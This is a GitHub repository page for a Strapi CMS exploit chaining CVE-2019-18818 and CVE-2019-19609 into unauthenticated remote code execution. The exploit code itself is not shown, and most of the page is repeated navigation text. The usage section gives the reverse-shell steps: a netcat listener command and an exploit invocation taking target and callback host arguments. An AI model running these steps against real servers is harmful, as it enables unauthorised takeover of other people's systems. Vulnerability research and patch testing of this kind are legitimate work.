Strapi CMS Exploit

This exploit targets two vulnerabilities in the Strapi CMS Framework version 3.0.0-beta-17.4 allowing for unauthenticated remote code execution (RCE).

Vulnerabilities

CVE-2019-18818

Weak Password Recovery Mechanism for Forgotten Password

CVSS: 9.8 - Critical

More details: https://nvd.nist.gov/vuln/detail/CVE-2019-18818

CVE-2019-19609

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

CVSS: 7.2 - High

More details: https://nvd.nist.gov/vuln/detail/CVE-2019-19609

Usage:

Before running this exploit, start a netcat listener on the lport you specify in the below options.

Start netcat listener

nc -lnvp <lport>

Run exploit

exploit.py <rhost> <lhost> <lport>

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
LICENSE		LICENSE
README.md		README.md
exploit.py		exploit.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

LICENSE

LICENSE

README.md

README.md

exploit.py

exploit.py

Repository files navigation

Strapi CMS Exploit

Vulnerabilities

CVE-2019-18818

CVE-2019-19609

Usage:

Start netcat listener

Run exploit

About

Languages

License

glowbase/CVE-2019-19609

Folders and files

Latest commit

History

LICENSE

LICENSE

README.md

README.md

exploit.py

exploit.py

Repository files navigation

Strapi CMS Exploit

Vulnerabilities

CVE-2019-18818

CVE-2019-19609

Usage:

Start netcat listener

Run exploit

About

Topics

Resources

License

Stars

Watchers

Forks

Languages